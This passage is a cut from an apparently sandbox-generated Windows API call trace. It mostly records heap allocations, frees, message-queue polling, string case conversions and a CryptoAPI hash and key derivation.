hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0163.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.627] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.627] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.627] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.627] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.627] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.628] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.628] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.628] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.628] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.628] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0163.628] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.628] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0163.628] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.628] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.628] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.628] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0163.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.629] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0163.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.629] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.629] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.629] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.629] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.629] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.629] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.629] CryptHashData (hHash=0xaa55e0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0163.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.629] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.629] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.630] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.630] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.630] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.630] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0163.630] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.630] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0163.630] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.630] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.630] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.630] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa55e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa56a0) returned 1 [0163.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0163.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0163.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0163.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0163.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0163.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0163.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0163.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0163.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0163.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0163.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0163.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0163.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0163.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0163.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0163.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0163.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0163.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0163.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0163.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0163.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0163.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0163.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0163.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0163.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0163.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0163.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0163.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0163.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0163.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0163.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0163.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0163.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0163.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0163.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0163.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0163.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0163.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0163.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0163.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0163.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0163.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0163.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0163.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0163.634] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0163.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0163.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0163.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0163.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0163.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0163.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0163.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0163.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0163.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0163.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0163.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0163.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0163.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0163.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0163.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0163.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0163.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0163.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0163.636] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0163.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0163.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0163.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0163.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0163.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.637] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0163.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0163.637] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0163.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0163.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0163.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0163.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0163.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0163.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0163.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0163.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0163.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0163.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0163.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0163.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0163.637] RtlAllocateHeap 